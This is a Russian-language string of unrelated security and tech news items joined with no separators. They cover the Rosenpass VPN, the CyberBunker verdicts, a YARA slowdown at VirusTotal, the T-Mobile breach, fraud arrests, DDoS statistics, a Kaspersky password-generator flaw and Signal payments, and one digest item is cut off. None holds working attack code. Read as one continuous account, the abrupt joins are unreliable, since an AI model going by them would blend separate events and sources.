Группа немецких исследователей, разработчиков и криптографов опубликовала первый выпуск проекта Rosenpass, развивающего VPN и механизм обмена ключами, устойчивые ко взлому на квантовых компьютерах. В качестве транспорта используется VPN WireGuard со штатными алгоритмами шифрования и ключами, а Rosenpass дополняет его средствами обмена ключами, защищёнными от взлома на квантовых компьютерах (т.е. Rosenpass дополнительно защищает обмен ключами, не меняя алгоритмы работы и методы шифрования WireGuard). Rosenpass также может применяться отдельно от WireGuard в форме универсального инструментария для обмена ключами, подходящего для защиты других протоколов от атак на квантовых компьютерах.
Код инструментария написан на языке Rust и распространяется под лицензиями MIT и Apache 2.0. Криптографические алгоритмы и примитивы заимствуются из библиотек liboqs и libsodium, написанных на языке Си. Опубликованная кодовая база позиционируется как эталонная реализация - на основе предоставленных спецификаций могут быть разработаны альтернативные варианты инструментария с использованием других языков программирования. В настоящее время ведётся работа по формальной верификации протокола, криптоалгоритмов и реализации для предоставления математического доказательства надёжности. В настоящее время при помощи ProVerif уже выполнен символьный анализ протокола и его базовой реализации на языке Rust.
Протокол Rosenpass основан на механизме постквантового аутентифицированного обмена ключами PQWG (Post-quantum WireGuard), построенного с использованием криптосистемы McEliece, устойчивой для подбора на квантовом компьютере. Генерируемый в Rosenpass ключ используется в форме разделяемого симметричного ключа (PSK, pre-shared key) WireGuard, реализуя дополнительный слой для гибридной защиты VPN-соединения.
Rosenpass предоставляет отдельно работающий фоновый процесс, применяемый для генерации предопределенных ключей WireGuard и защиты обмена ключами в процессе согласования соединения (handshake) с использованием методов постквантовой криптографии. Как и в WireGuard симметричные ключи в Rosenpass обновляются каждые две минуты. Для защиты соединения используются разделяемые ключи (на каждой стороне генерируется пара из открытого и закрытого ключа, после чего участники передают друг другу открытые ключи).
Стойки из-под конфискованных серверов в дата-центре CyberBunker. Фото: EPA
Анонимный хостинг в Германии — опасное дело. По крайней мере, для владельцев этого хостинга и его сотрудников.
Два года назад бойцы немецкого спецназа и полиции взяли штурмом защищённый и охраняемый подземный бункер, в котором располагался дата-центр CyberBunker.com — пионер анонимного хостинга, работавший с 1998 года.
Сейчас в деле поставлена точка. Немецкий суд [огласил
приговоры](https://www.nrc.nl/nieuws/2021/12/14/zware-celstraffen-in-
cyberbunker-zaak-a4068833) для восьми человек, причастных к работе дата-
центра.
13 декабря 2021 года немецкий суд вынес вердикт. Основной владелец дата-центра
— 62-летний голландец Герман-Йохан Ксеннт (Herman-Johan Xennt) приговорён к
пяти годам и девяти месяцам лишения свободы. Его девушка, двое сыновей и ещё
трое соучастников получили от двух лет и четырёх месяцев до четырёх лет и трёх
месяцев. Восьмой подозреваемый получил год условно.
Владелец и оператор кибербункеров Герман Йохан Ксеннт. Изображение: The
Sunday World, 26 июля 2015 года
Дата-центр размещался внутри бывшего подземного комплекса НАТО, построенного в 1955 году как защищённый бункер на случай ядерной войны. «Пуленепробиваемый хостинг» много лет успешно игнорировал любые жалобы DMCA из США, принимал биткоины и не требовал от клиентов никакой личной информации, кроме адреса электронной почты, [пишет](https://www.newyorker.com/magazine/2020/08/03/the- cold-war-bunker-that-became-home-to-a-dark-web-empire) New Yorker.
Однако ночью 26 сентября 2019 года бизнесу пришёл конец. В эту ночь немецкие силовые структуры провели спецоперацию со штурмом укреплённого сооружения.
Схема бункера. Рисунок: полиция Германии, во времяподготовки к штурму
В операции приняли участие около 650 человек, включая сотрудников правоохранительные органов, спасательные службы, пожарных, медицинский персонал, операторов дронов и т. д.
Ночная съёмка с дрона: полиция перед входом в бункер вскоре после начала
штурма
Бункер был выкопан около городка Трабен-Трарбах в юго-западной части Германии (земля Рейнланд-Пфальц). Четыре подземных этажа уходили на 25 метров в землю.

Полиция Германии несколько лет изучала деятельность хостера и тщательно готовила операцию. Одновременно со штурмом бункера были задержаны семь человек, которые в этот момент находились в ресторане Трабен-Трарбаха и в городе Швальбах, недалеко от Франкфурта.
В дата-центре полиция конфисковала 403 сервера, 412 жёстких дисков, 65 USB- флэшек, 61 ноутбук/десктоп, 57 телефонов и около ста тысяч евро наличными.
О количестве конфискованной крипты не сообщается. Но можно заметить, что [конфискованные биткоины по делу Silk Road](https://www.theguardian.com/technology/2020/nov/06/us-seizes-1bn-in- bitcoin-linked-to-silk-road-site) в похожей ситуации Служба маршалов США [продаёт отдельными лотами](https://techcrunch.com/2014/12/05/us-marshals- complete-second-auction-of-silk-road-bitcoin/) на аукционах для избранных покупателей. Так что и биткоины CyberBunker, накопленные с 2013 года, могут скоро появиться на рынке.
Как выяснило следствие, владелец хостинга Герман-Йохан Ксеннт приобрёл бывший военный бункер в 2013 году — и сразу сообщил местным жителям, что будет здесь строить хорошо защищённый центр обработки данных.
К тому моменту Ксеннт уже организовал аналогичный «пуленепробиваемый хостинг» в другом бывшем бункере НАТО около голландского города Гус.
В Германии хостера нельзя привлечь к ответственности за размещение незаконных веб-сайтов, если он не знал о незаконной деятельности. Однако следствию удалось доказать, что владельцы CyberBunker прекрасно знали о своих клиентах, но всё равно помогали им сохранить приватность.
На этом хостинге размещались десятки подпольных сайтов, включая крупные магазины запрещённых наркотиков Cannabis Road, Fraudsters, Flugsvamp, Flight Vamp 2.0, Orange Сhemicals и Wall Street Market. Отсюда же управлялись некоторые крупномасштабные DDoS-атаки, в том числе атака на маршрутизаторы Deutsche Telekom в ноябре 2016 года.
Хотя Кибербункера больше нет, но другие защищённые и анонимные хостеры [продолжают работать](https://www.hostingadvice.com/how-to/best-anonymous-web- hosting/). Они обычно физически размещены за пределами американской юрисдикции, в офшорных зонах, и декларируют максимальную приватность.
source: nrc.nl/nieuws/2021/12/14/zware-celstraffen-in-cyberbunker- zaak-a4068833
Суд вынес приговор украинцу за создание и распространение вредоносного ПО, предназначенного для несанкционированного доступа к почтовым ящикам пользователей.
Уроженец Винницы, обладая специальными навыками в сфере разработки программного обеспечения, программирования и социальной инженерии, в сентябре 2019 года, с целью распространения, создал вредоносное ПО, которое через файлообменник в Интернете распространил неопределенному кругу лиц.
В судебном заседании обвиняемый свою вину признал и сообщил суду, что на языке программирования «Java» написал программу, которая работает, как почтовый клиент. Задача этой программы заключается в несанкционированном доступе к почтовым ящикам. Также он сообщил, что разместил данную программу на файлообменнике для того, чтобы другие пользователи могли ее скачивать, устанавливать у себя на компьютере и использовать.
Суд квалифицировал действия обвиняемого по ч. 1 ст. 361-1 УК Украины, как создание с целью распространения, а также распространение вредоносных программных средств, предназначенных для несанкционированного вмешательства в работу компьютерных сетей.
Суд признал мужчину виновным и назначил наказание в виде штрафа в размере 2000 необлагаемых минимумов доходов граждан, что составляет 34000 гривен. Кроме штрафа, суд обязал подсудимого оплатить 13729,60 гривен за проведение компьютерно-технической экспертизы.
Как сообщило полицейское управление Гонконга, в 2021 году значительно выросло количество киберпреступлений, особенно резко взлетел показатель мошенничеств с криптовалютами.
За первые шесть месяцев 2021 года было зафиксировано 496 случаев киберпреступлений, а потери жертв мошенничества составили 214 млн гонконгских долларов ($27.5 млн). Для сравнения, за весь 2020 год было зафиксировано 208 случаев, а убытки составили 114 млн гонконгских долларов ($14.6 млн).
Значительный рост количества мошенничеств связан с интересом местных жителей к инвестированию в криптовалюты. На этом фоне активизировались и мошенники. Так, [по данным South China Morning Post](https://www.scmp.com/news/hong-kong/law- and-crime/article/3143394/cryptocurrency-crime-hong-kong-hits-record-levels- one?module=perpetual_scroll&pgtype=article&campaign=3143394), 30-летний житель Гонконга потерял почти $16 млн на инвестировании в цифровые активы – средства он передал неким «консультантам», которые сбежали после получения денег. Также было три случая, когда деньги крали при пиринговых транзакциях криптовалют.
Главный инспектор бюро полиции по кибербезопасности и технологическим преступлениям Лестер Ип Чеук-ю (Lester Ip Cheuk-yu) отметил, что росту популярности инвестиций в криптовалюты поспособствовала пандемия COVID-19. Она же стала причиной роста количества преступлений в этой сфере.
«Люди гораздо чаще оставались дома, а значит больше времени проводили в интернете. У мошенников оказалось больше возможностей заманить людей в свои схемы. Этот тренд заметен не только в Гонконге, но и по всему миру», – отметил Лестер Ип Чеук-ю.
Среди киберпреступлений чаще всего встречаются случаи отмывания денег с помощью криптовалют, мошенничество во время онлайн-покупок и совершения пиринговых криптовалютных транзакций, а также инвестиционное мошенничество.
«Граждане должны дважды подумать, заслуживает ли доверия человек, предлагающий выгодные инвестиционные схемы, и безопасны ли места встреч при совершении обмена. Многие плохо понимают криптовалюты, что делает их еще более легкими жертвами для мошенников», – напомнил главный инспектор гонконгской полиции.
Ип Чеук-ю отметил, что зачастую жертвами мошенников становятся молодые люди. Просто потому, что старшее поколение не может разобраться с технологиями и купить или отправить мошенникам криптовалюты.
Администрация платформы VirusTotal сообщила, что на этой неделе исправила ошибку, которая замедляла поиск угроз на сайте. Проблема затрагивала движок сканирования YARA, который является компонентом VirusTotal и позволяет исследователям осуществлять поиск по огромной базе малвари с помощью простых текстовых правил.
Разработчик, VirusTotal и создатель YARA Виктор Мануэль Альварес пишет в Twitter, что в корне этой проблемы лежал простой паттерн.
{ 00000008 [1-60] 00 [1-60] 00 [1-60] 00000008 [1-60] 00 [1-60] 00 [1-60] 00000008 [1-60] 00 [1-60] BB }
— Victor M. Alvarez (@plusvic) July 8, 2021Click to expand...
«Фактический паттерн был еще более незаметным, он выглядел похожим на другие паттерны, которые не создавали никаких проблем, но дьявол кроется в деталях. Причиной бага были множественные и относительно длинные переходы, такие как [0-60], разделенные коротким и распространенным паттерном 00.
YARA использует два разных алгоритма для сопоставления таких шаблонов: один — более сложный, для полноценных регулярных выражений, а другой — более простой и примитивный алгоритм для определенных hex-паттернов, подобных приведенному выше.
Такие HEX-паттерны могут сопоставляться с использованием полноценного алгоритма регулярных выражений (их можно представить как обычные regexp), но более примитивный алгоритм обычно быстрее. Обычно.
Полноценный алгоритм регулярных выражений медленнее, чем примитивный в 99% случаев, однако у него есть одно хорошее свойство: его временная сложность линейна, и нет “плохих случаев”, которые могут замедлить алгоритм экспоненциально.
Примитивный алгоритм в большинстве случаев быстрее, но он имеет экспоненциальный рост во времени. “Плохие случаи” действительно плохи. Правило, вызвавшее эту ошибку, один из таких по-настоящему плохих случаев», — рассказывает Альварес.Click to expand...
Эксперт отмечает, что описанная проблема – это встречающийся крайне редко сценарий, которого в компании не видели годами. Однако в итоге проблема коснулась клиентов VirusTotal, особенно 7 июля 2021 года, когда ошибка замедлила большинство поисков YARA на платформе.
Как теперь сообщают в VirusTotal, проблема полностью устранена, и платформа уже работает в нормальном режиме.
Source: <https://xakep.ru/2021/07/09/na-virustotal-ispravili-oshibku-kotoraya- zamedlyala-poisk-ugroz/>
Американский телефонный гигант T-Mobile (очередной раз) был взломан в рамках масштабной кибератаки на американские и международные телефонные и интернет- компании в последние месяцы, сообщает [Wall Street Journal](https://www.wsj.com/politics/national-security/t-mobile-hacked-in- massive-chinese-breach-of-telecom-networks-4b2d7f92).
Компания T-Mobile заявила, что «внимательно следит за этой атакой в масштабах всей индустрии, и на данный момент системы и данные T-Mobile не подверглись какому-либо значительному воздействию, и у нас нет доказательств того, что информация клиентов была затронута», - говорится в заявлении, поступившем в редакцию TechCrunch.
Первым о взломе в T-Mobile сообщил Wall Street Journal, ссылаясь на источники, знакомые с кампанией, направленной против телекоммуникационных гигантов.
Представитель T-Mobile, не назвавший своего имени, не сказал, есть ли у компании технические средства, такие как журналы, чтобы определить, к каким данным клиентов был получен доступ или они были удалены. Представитель не стал оспаривать сообщение журнала.
T-Mobile - в череде последних телекоммуникационных компаний, которая за последние недели подверглась вторжению, связанному с серией кибератак на телефонные и интернет-компании, включая AT&T, Verizon и Lumen (бывшая CenturyLink). Взломы, осуществленные группой хакеров, работающих на китайское правительство и получившие название Salt Typhoon, были направлены на системы прослушки, которые американские телефонные и интернет-компании обязаны использовать в соответствии с 30-летним федеральным законом, позволяющим правительству получать доступ к данным клиентов.
На этой неделе ФБР и американское агентство кибербезопасности [CISA выступили с предупреждением о связанных между собой кибератаках](https://techcrunch.com/2024/11/14/us-confirms-china-backed- hackers-breached-telecom-providers-to-steal-wiretap-data/), обвинив Китай в проведении «широкой и значительной кампании кибершпионажа», направленной на прослушивание записей звонков и текстовых сообщений высокопоставленных американских чиновников, включая кандидатов в президенты.
По данным TechCrunch, это уже девятая (!!!) известная кибератака на T-Mobile за последние годы. Последняя атака на T-Mobile произошла в 2023 году и привела к краже личной информации 37 миллионов клиентов T-Mobile.
source: <https://techcrunch.com/2024/11/16/t-mobile-hack-linked-to-chinese- breaches-of-telecom-networks/>
#digest Первый весенний месяц позади, так что подводим его итоги. В марте шуму наделал бэкдор в XZ Utils под Linux — он не успел добраться до стабильных релизов, но в перспективе мог стать инцидентом космических пропорций. В начале месяца Black Cat провернула экзит-скам, а натужные попытки LockBit создать видимость продолжения операций никого особо не убедили.
Кроме того, санкции в России добрались до облаков, телекоммуникационный провайдер AT&T в США получил неприятный привет из прошлого, а ЦРУ признало ценность OSINT.
«Сотрудники Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий ГУ МВД России по г. Санкт-Петербургу и Ленинградской области по подозрению в содействии телефонным мошенникам из Украины задержали четверых фигурантов, двое из которых – местные жители», – сообщила официальный представитель МВД России Ирина Волк.
Предварительно установлено, что задержанные входили в группировку, участники которой совершали хищения денежных средств с банковских счетов граждан Российской Федерации. Находившиеся на территории Украины сообщники из специально оборудованных кол-центров звонили россиянам от имени сотрудников службы безопасности и технической поддержки Центрального банка Российской Федерации. В телефонном разговоре они сообщали, что к личному кабинету интернет-банкинга гражданина якобы подключены посторонние устройства, или о выявлении мошеннических операций с его счетами. Под предлогом проверки потерпевшему присылалась ссылка. Она вела на сайт с вредоносными программами, установка которых обеспечивала аферистам дистанционное управление всеми установленными на смартфон приложениями.
Злоумышленники знали о том, что в России крупные переводы между физическими лицами блокируются системой безопасности банков. Поэтому после получения удаленного контроля над интернет-банкингом гражданина они в различных интернет-магазинах покупали дорогостоящую электронику, которую оплачивали с расчетных счетов потерпевших. Затем находившиеся в Российской Федерации участники криминальной схемы получали заказанную технику и сбывали ее через интернет-сервисы бесплатных объявлений. Часть денежных средств конвертировалась в криптовалютные активы и направлялась украинским работодателям.
«В результате оперативно-розыскных мероприятий получены данные о причастности задержанных не менее чем к 30 эпизодам противоправной деятельности.
По адресам проживания подозреваемых проведены обыски, в результате которых изъято 16 миллионов рублей, несколько десятков мобильных телефонов в заводской упаковке, более сотни банковских и сим-карт, мобильные телефоны, ноутбуки, а также другие предметы и документы, имеющие доказательстенное значение.
Следователями территориальных подразделений МВД России возбуждены уголовные дела по признакам преступлений, предусмотренных статьями 158 и 159 УК РФ. Трое из фигурантов заключены под стражу, в отношении одного избрана мера процессуального принуждения в виде обязательства о явке.
Проводятся мероприятия по установлению всех эпизодов противоправной деятельности задержанных и их соучастников», – уточнила Ирина Волк.
Правоохранительные органы Чехии и Украины совместными усилиями задержали членов двух группировок интернет-мошенников, которые украли у посетителей маркетплейсов в Сети около 123 млн крон (примерно $6 млн). Об этом 6 декабря сообщил глава чешского Национального центра борьбы с терроризмом, экстремизмом и киберпреступностью Бржетислав Брейха.
«Полиция разбила две преступные группировки интернет-мошенников. Обвинения выдвинуты против десятков их участников в Чехии и на Украине. Принципиально значимая часть операции была проведена на Украине. В этой стране мошенники создали call-центр, через который осуществляли связь со своими жертвами», — рассказал Брейха на пресс-конференции.
Полиции удалось установить, что злоумышленники создавали в интернете ложные торговые сайты и занимались воровством персональных данных их посетителей. В ходе обысков у участников преступных группировок изъяли телефоны, компьютеры, автомобили и денежные средства (более $200 тыс).
Кроме того, в Чехии была задержана женщина, которая возглавляла одну из группировок. Как отметил Брейха, злоумышленница согласилась сотрудничать со следствием. Ей назначили наказание в виде 5,5 года тюрьмы, а также штраф в размере 5 млн крон (около $225 тыс.).
Неизвестные хакеры хакеры заявили, что взломали аккаунт администратора популярного приложения i2VPN с более 500 000 загрузок и получили доступ к пользовательским данным.
По словам злоумышленников, они получили доступ к главной панели администратора i2VPN, получив конфиденциальную информацию сотен тысяч пользователей. О взломе стало известно, когда ИБ-специалисты SafetyDetectives обнаружили, что хакеры разместили украденную информацию от i2VPN в Telegram-канал.
По данным SafetyDetectives просочившиеся данные включали адрес электронной почты и пароль администратора, а также скриншоты панели инструментов, отображающие центры обработки данных и сведения о подписке пользователей.
Хотя хакеры не раскрывали пользовательские данные напрямую, скомпрометированные учетные данные панели администратора потенциально предоставляют доступ к значительному объему личной информации и центрам обработки данных. Приложение i2VPN обладает более 500 000 загрузок только из магазина Google Play. Точное количество загрузок из App Store остается неизвестным, но стоит предположить, что инцидент может затронуть значительное количество людей.
Если информация о взломе подтвердится, просочившиеся данные могут раскрыть конфиденциальную информацию, включая идентификаторы пользователей, логины, email-адреса и информацию о подписке, такую как способы оплаты и даты истечения срока действия.
Поскольку расследование нарушения продолжается, i2VPN должен предпринять быстрые действия для устранения уязвимостей в системе безопасности и укрепления своей системы, чтобы предотвратить подобные инциденты в будущем. Пользователям рекомендуется сохранять бдительность и быть в курсе любых официальных уведомлений от i2VPN о взломе и рекомендуемых мерах безопасности.
© securitylab
Производитель криптоматов General Bytes сообщил о взломе своей облачной платформы. Хакеры устанавливали вредоносное ПО на устройства и получали доступ к активам пользователей, похитив свыше $1,5 млн.
В бюллетене, опубликованном General Bytes, сказано, что благодаря уязвимости, злоумышленники могут удаленно загружать на криптоматы компании Java- приложения. С их помощью хакеры могут получить доступ к информации пользователей и вводимые данные, а также украсть криптовалюты с горячих кошельков. Компания приостановила работу своего облачного сервиса, но и криптоматы, подключенные к сторонним серверам, также остаются уязвимыми.
«Хакеры могут получить доступ к базе данных. Могут читать и дешифровать API- ключи, используемые для доступа к средствам на горячих кошельках и биржах, выводить с них активы. Также имеют доступ к именам пользователей, могут скачать хэши их паролей и отключать двухфакторную аутентификацию», ― сообщил основатель General Bytes Карел Киовский (Karel Kyovsky).
Компания опубликовала список из 41 адреса кошельков, на которые хакеры переводили средства. Больше всего они вывели биткоинов ― на кошельке хранится 56 BTC, что составляет свыше $1,54 млн. Кроме того, злоумышленники смогли украсть почти 22 ETH.
Это уже не первый случай взлома криптоматов General Bytes. В августе прошлого года компания сообщила о взломе своего сервера криптоприложений. При этом, как заявлено на сайте фирмы, она выпустила более 15 000 криптоматов, которые используются фирмами из 149 стран.
Qrator Labs, специализирующаяся на обеспечении доступности интернет-ресурсов и нейтрализации DDoS-атак, представила статистику DDoS-атак и BGP-инцидентов во II квартале 2021 г.
Во II квартале 2021 г. был зафиксирован серьезный рост UDP flood атак, на долю которых пришлось более половины нападений – 53,04%. Именно UDP flood используется для генерации большого количества флуда из-за большого числа уязвимых серверов. Рост этого сегмента обусловлен увеличением доли атак полосой 10-100 Гбит/сек – это класс высокоскоростных атак, для организации которых часто используется техника Amplification публичных UDP-сервисов.
Более сложные атаки, такие как SYN flood, также не сдают своих позиций: их доля во II квартале составила 11,9%. Такие атаки опасны тем, что приводят в беспорядок инфраструктуру, «выключают» отдельные устройства, и бороться с ними путем простого сброса трафика не получается – для этого требуются более «умные» методы фильтрации.
Теперь три основных «чистых» вектора атак – это UDP-, IP- и SYN-флуд, на которые приходится 78% всех DDoS-атак II квартала.
Во II квартале медианное время атаки составило 270 секунд, что близко к наблюдениям за 2020 г., когда этот показатель равнялся 300 секундам. По сравнению с I кварталом 2021 г., медианное время атаки выросло значительно – со 180 секунд.
Среднее время атаки выросло еще существеннее – с ~700 секунд в I квартале до почти 2 тыс. секунд во II, увеличившись почти трехкратно.
Большая продолжительность была почти универсальным правилом для атак II квартала 2021 г. По сравнению с I кварталом во II даже самые короткие атаки удвоились в продолжительности.
Средняя пропускная способность всех DDoS-атак II квартала 2021 г. составила 6,5 Гбит/с. В I квартале эта цифра была чуть выше – 9,15 Гбит/с, тогда как в IV квартале 2020 г. данный показатель составил лишь 4,47 Гбит/с.
Впечатляет, особенно учитывая, что почти во всем мире май и июнь можно считать отпускными месяцами. А с увеличением продолжительности атаки это еще более тревожная, хотя и ожидаемая тенденция.
Размер наибольшего наблюдаемого ботнета вырос практически в два раза: с 73892 машин в I квартале 2021 г. до 137696 – во II. Большинство заблокированных IP- адресов, из которых состоял данный ботнет, были из Вьетнама, Индии, Индонезии и Таиланда.
В интернете полоса пропускания постоянно растёт, каналы увеличиваются, поэтому если раньше многие атаки были меньше по полосе пропускания просто потому, что они «забивали» локальную последнюю милю, то теперь последняя миля – это оптоволокно в каждый дом, по гигабиту в каждую квартиру и даже в каждый телефон, поскольку развертывание сетей 5G идет семимильными шагами. Все это приводит к тому, что тихо и незаметно даже самые рядовые, не исключительные атаки начинают переходить из сегмента с полосой пропускания 1-10 Гб/сек в более серьезный сегмент – 10-100 Гб/сек. Сегодня на его долю приходится уже треть всех зафиксированных атак.
Раньше сегмент 1-10 Гб/сек был показательным, поскольку в диапазоне 10-100 Гб/сек было не так много атак. Однако теперь диапазон 10-100 Гб/сек придется разбивать на более мелкие отрезки для демонстрации явной динамики перехода нападений в сегменты с более высокими скоростями.
Проведение Чемпионата Европы по футболу 2020 не могло не оказать влияние на динамику атак на онлайн-ресурсы компаний из различных сфер бизнеса. Несмотря на то что май и июнь – довольно спокойные месяцы из-за начала отпускного периода, в этом году благодаря Евро-2020 они продемонстрировали интересную динамику в части атак.
На ряд индустрий нагрузка действительно упала. Например, атаки на игровой сектор сократились в пять раз: с 11,74% до 2,29%, на сегмент FOREX – в два раза с 5,87% до 2,74%.
Однако злоумышленники переключили свое внимание на другие сферы бизнеса. В частности, доля числа нападений на сегмент беттинга выросла в четыре раза: с 2,20% до 8,38%, продемонстрировав типичный сценарий организации заказных DDoS- атак в конкурентной среде. С началом Чемпионата Европы по футболу игроки индустрии ставок на спорт стали давать активную рекламу своих услуг в интернете, вкладывая значительные средства в маркетинг. Поэтому неудивительно, что число атак на этот сегмент резко возросло ввиду существенного обострения конкуренции.
Количество уникальных автономных систем, которые участвовали в перехватах или утечках маршрутов BGP, немного снизилось во II квартале по сравнению с I, хотя количество участников в отдельно наблюдаемых месяцах почти не изменилось. Кроме этого, в мае и июне количество перехватывающих автономных систем значительно выросло, по сравнению с предыдущими месяцами. Так, май стал первым месяцев, когда количество уникальных автономных систем, создававших перехваты, превысило 10 тыс.
Количество отдельных инцидентов, связанных с перехватом или утечкой маршрутов также выросло, по сравнению с I кварталом. Почти 10 млн утечек маршрутов во II квартале – значительное число, которое будет разве что увеличиваться в отсутствие значительных мер по их предотвращению. Количество перехватов оказалось сопоставимо с II кварталом 2021 г.
Обнаружен один из мощнейших ботнетов в истории интернета, который позволяет запускать DDoS-атаки до 2 Тбит/с
Специалисты компании StormWall зафиксировали DDoS-атаки, организованные с помощью самого мощного ботнета за все время существования интернета. Максимальная мощность атаки доходит до 2 Тбит/с, что на данный момент является абсолютным рекордом среди всех атак с участием ботнетов. Большинство DDoS-атак были направлены на игровую индустрию.
Новый ботнет состоит из 49 тыс. устройств, среди которых, что примечательно, находятся только серверы, обычные же компьютеры и мобильные устройства отсутствуют. Атаки, осуществляемые новым ботнетом, достаточно стандартны, он умеет запускать атаки по протоколам UDP, TCP и HTTP (на уровне 7 модели OSI) с эмуляцией браузера. Хакеры используют новый инструмент уже около месяца, специалисты фиксируют мощнейшие атаки на российские компании каждый день. Ботнет имеет испанское происхождение, его можно приобрести в интернете, стоимость инструмента от $2500 за два дня.
Новый ботнет намного опаснее своих предшественников. Атаки такой мощности затрагивают не только жертву, но и всю цепочку его провайдеров и может вызвать проблемы с доступом к интернету одновременно у сотен тысяч пользователей и онлайн-ресурсов. Из-за того, что атака имеет большую мощность, защита от нее будет стоить дорого, и справиться с ней смогут только облачные сервисы DDoS- защиты, обладающие достаточной емкостью сети фильтрации, а о самостоятельной защите не может быть и речи.
В прошлом году разработчики Kaspersky Password Manager (KPM) попросили пользователей обновить свои пароли на более стойкие. Теперь специалисты Ledger Donjon (ИБ-подразделение компании Ledger, разрабатывающей крипокошельки) рассказали о том, почему это произошло, и какие проблемы они обнаружили в KPM некоторое время назад.
Эксперты напоминают, что в марте 2019 года компания «Лаборатория Касперского» [выпустила обновление](https://www.kaspersky.com/about/press- releases/2019_kaspersky-password-manager) для KPM, пообещав, что теперь приложение сможет выявлять слабые пароли и генерировать для них более надежные замены. Три месяца спустя команда Ledger Donjon обнаружила, что KPM справляется с этим не слишком хорошо, так как использует генератор псевдослучайных чисел, не дающий достаточно случайных результатов для создания надежных паролей. В частности, символы в паролях генерировались и располагались не совсем случайным образом.
«Генератор паролей в Kaspersky Password Manager имел несколько проблем. Наиболее критичным было то, что он использовал генератор псевдослучайных чисел, непригодный для криптографических целей. Единственным источником энтропии в нем было текущее системное время, и все пароли, которые он создавал, можно было подобрать за считанные секунды», — рассказывают эксперты.
Click to expand...
Дело в том, что KPM был создан для генерации 12-значных паролей по умолчанию, хотя позволял пользователям персонализировать свои пароли, изменяя настройки, в том числе длину пароля, использование прописных и строчных букв, цифр и специальных символов. Исследователи Ledger Donjon говорят, что стремясь создать пароли, максимально отличные от паролей, сгенерированных самими людьми, приложение стало предсказуемым.
Использование системного времени в качестве случайного seed-значения означало, что KPM генерировал одинаковые пароли, если пользователи в разных точках мира нажимали на кнопку создания пароля в одно и то же время и не меняли настройки по умолчанию. При этом в интерфейсе KPM отображалась анимация быстро меняющихся случайных символов, которая скрывала фактический момент генерации пароля, и затрудняла выявление проблемы.
[](https://xakep.ru/wp- content/uploads/2021/07/353045/password_generation.gif)
По словам исследователей, создаваемые с использованием времени пароли были весьма ограничены, и их можно было подобрать за несколько минут. Так, если атакующему было известно время создания конкретной учетной записи (что совсем нетрудно посмотреть на любом форуме), диапазон вероятностей сильно сокращался, равно как и время, необходимое для брутфорса, который мог занять всего несколько секунд.
«Последствия [использования такого механизма] определенно были скверные: любой пароль мог быть взломан. Например, между 2010 и 2021 годом прошло 315619200 секунд, поэтому KPM может сгенерировать не более 315619200 паролей для заданного набора символов. Их перебор занимал всего несколько минут», — гласит отчет Ledger Donjon.
Click to expand...
В период с октября по декабрь 2019 года разработчики представили ряд патчей для KPM (поскольку исходный патч для Windows работал некорректно), и в итоге проблему исправили в Windows, Android и iOS.
В октябре 2020 года «Лаборатория Касперского» выпустила KPM 9.0.2 Patch M, уведомив пользователей о необходимости обновления некоторых слабых паролей на более надежные. Этой проблеме был присвоен идентификатор CVE-2020-27020, о котором компания рассказала в сообщении от апреля 2021 года.
«”Лаборатория Касперского” устранила проблему безопасности в Kaspersky Password Manager, которая потенциально позволяла злоумышленнику узнать пароли, сгенерированные этим инструментом. Эта проблема проявлялась лишь в том маловероятном случае, когда злоумышленник знал информацию об учетной записи пользователя и знал точное время, когда был сгенерирован пароль», — комментируют представители «Лаборатории Касперского».
Click to expand...
Source: https://xakep.ru/2021/07/07/kaspersky-password-manager-bug/
Организация Signal Technology Foundation, развивающая систему защищённых коммуникаций URL="https://signal.org/"]Signal[[/URL], возобновила публикацию кода серверных частей мессенджера. Код проекта изначально было открыт под лицензией AGPLv3, но публикация изменений в публичном репозитории без объяснения причин была прекращена 22 апреля прошлого года. Обновление репозитория прекратилось после объявления о намерении интегрировать в Signal систему платежей.
На днях [началось тестирование](https://signal.org/blog/help-us-test-payments- in-signal/) встроенной в Signal системы платежей, основанной на собственной криптовалюте MobileCoin (MOB), разработанной Мокси Марлинспайком (Moxie Marlinspike), автором протокола Signal. Примерно в это же время в репозитории были опубликованы накопившиеся за год изменения серверных компонентов, в том числе включающие реализацию системы платежей.
Криптовалюта MobileCoin спроектирована для построения сети мобильных платежей, обеспечивающей конфиденциальность пользователей. Данные пользователей остаются только в их руках и разработчики Signal или администраторы элементов инфраструктуры не имеют возможность получить доступ к деньгам, данным о балансе пользователя и истории транзакций. Платёжная сеть не имеет единой точки контроля и основывается на идее долевого владения, суть которой в том, все средства сети образуются как совокупность индивидуальных долей, которыми можно обмениваться. Общий размер средств в сети фиксирован и составляет 250 миллионов MOB.
В основе MobileCoin лежит блокчейн, в котором сохраняется история всех успешных платежей. Для подтверждения владением средств необходимо наличие двух ключей - ключ для передачи средств и ключ для просмотра состояния. Для большинства пользователей указанные ключи можно извлечь из общего базового ключа. Для получения платежа пользователь должен предоставить отправителю два открытых ключа, соответствующих имеющимся закрытым ключам, используемым для отправки и подтверждения владением средств. Транзакции формируются на компьютере или смартфоне пользователя, после чего передаются на один из узлов, имеющих статус валидатора, для обработки в изолированном анклаве. Валидаторы проверяют транзакцию и по цепочке (peer to peer) делятся информацией о транзакции с другими узлами с сети MobileCoin.
Данные могут быть переданы только узлам криптографичкески подтвердившим использование в анклаве немодифицированного кода MobileCoin. Каждый изолированный анклав реплицирует конечный автомат (state machine), который добавляет действительные транзакции в блокчейн, используя для подтверждения платежей алгоритм достижения консенсуса (MobileCoin Consensus Protocol). Узлы также могут брать на себя роль полных валидаторов, которые дополнительно формируют и размещают в сетях доставки контента публичную копию вычисленного блокчейна. В итоговом блокчейне отсутствуют сведения, позволяющие идентифицировать пользователя без знания его ключей. В блокчейне присутствуют лишь идентификаторы, вычисленные на основе ключей пользователя, зашифрованные данные о средствах и метаданные для контроля целостности.
Для обеспечения целостности и защиты от искажения данных задним числом применяется древовидная структура "дерево Меркла" (Merkle Tree), в которой каждая ветка верифицирует все нижележащие ветки и узлы благодаря совместному (древовидному) хешированию. Имея конечный хеш, пользователь может удостовериться в корректности всей истории операций, а также в корректности прошлых состояний БД (корневой проверочный хеш нового состояния базы вычисляется с учётом прошлого состояния).
Кроме валидаторов в сети также имеются наблюдающие узлы (Watcher), которые занимаются верификацией цифровых подписей, которые валидаторы прикрепляют к каждому блоку в блокчейне. Наблюдающие узлы постоянно отслеживают целостность децентрализованной сети, поддерживают собственные локальные копии блокчейна и предоставляют API для приложений-кошельков и клиентов, занимающихся обменом. Валидатор и наблюдающий узел может запустить любой желающий, для этого распространяются соответствующие сервисы, образы анклава для Intel SGX и демон mobilecoind.
